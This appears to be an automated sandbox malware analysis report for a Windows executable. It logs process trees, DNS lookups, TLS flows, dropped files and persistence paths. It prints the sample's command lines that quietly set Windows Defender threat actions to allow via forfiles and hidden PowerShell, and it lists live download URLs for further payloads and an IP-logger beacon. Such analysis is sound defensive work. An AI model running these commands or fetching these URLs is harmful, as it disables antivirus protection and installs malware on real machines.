Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Aug. 18, 2024, 2:11 p.m. | Aug. 18, 2024, 2:13 p.m. |
-
-
-
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2404-
forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
2488 -
forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
2660 -
forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
2792 -
forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
2924 -
forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3056-
-
-
gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
2432
-
-
-
-
-
-
-
-
PVxQ006P3ViJx91yQ0kRztj8.exe "C:\Users\test22\Pictures\PVxQ006P3ViJx91yQ0kRztj8.exe"
2308
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
58yongzhe.com | 62.133.62.93 | |
yip.su | 172.67.169.89 | |
pastebin.com | 104.20.4.235 | |
cdn.discordapp.com | 162.159.133.233 | |
iplogger.com | 172.67.188.178 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49164 104.20.3.235:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | e3:4a:2e:16:cc:2b:72:f6:c5:22:3e:52:49:b3:50:2a:1b:85:6f:8b |
TLS 1.2 192.168.56.103:49165 172.67.169.89:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49170 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com | 97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39 |
TLS 1.2 192.168.56.103:49193 172.67.188.178:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=iplogger.com | ff:db:b3:bf:95:97:b5:c1:dd:90:3f:4c:9a:d3:69:3b:39:78:66:96 |
pdb_path | 7'Pa#zy~)'oSSG.S(f5g\MKCA?m'X>."/m9X/UShzY,'']~^H~CVT x;}Gv-y6$WSTaHpkVCc^}<(rl(6C8C}oM1"R |
section | .managed |
section | hydrated |
resource name | BINARY |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://194.58.114.223/d/385104 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://58yongzhe.com/parts/setup1.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://pastebin.com/raw/E0rY26ni | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://yip.su/RNWPd.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://cdn.discordapp.com/attachments/1272578305203110022/1274580536710533180/setup.exe?ex=66c2c520&is=66c173a0&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f& | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://iplogger.com/1lyxz |
request | GET http://194.58.114.223/d/385104 |
request | GET http://58yongzhe.com/parts/setup1.exe |
request | GET https://pastebin.com/raw/E0rY26ni |
request | GET https://yip.su/RNWPd.exe |
request | GET https://cdn.discordapp.com/attachments/1272578305203110022/1274580536710533180/setup.exe?ex=66c2c520&is=66c173a0&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f& |
request | GET https://iplogger.com/1lyxz |
file | C:\Users\test22\AppData\Local\2UuVAtmjLx7l1otCRUqPqmbZ.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\on4lsEWFP5S3BYZqH9VhlFbH.bat |
file | C:\Users\test22\Pictures\PVxQ006P3ViJx91yQ0kRztj8.exe |
file | C:\Users\test22\AppData\Local\Ud9WaJT4i8EoA2aHBSB1VWQO.exe |
file | C:\Users\test22\Pictures\oGMrVNo8MvswPsMem9YEkgFm.exe |
file | C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp\Install.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w15mrXgHAkyAcT7dJJkculm7.bat |
file | C:\Users\test22\AppData\Local\Temp\7zSCCF0.tmp\Install.exe |
file | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell start-process -WindowStyle Hidden gpupdate.exe /force |
cmdline | forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force |
file | C:\Users\test22\AppData\Local\2UuVAtmjLx7l1otCRUqPqmbZ.exe |
file | C:\Users\test22\AppData\Local\Ud9WaJT4i8EoA2aHBSB1VWQO.exe |
wmi | <INVALID POINTER> |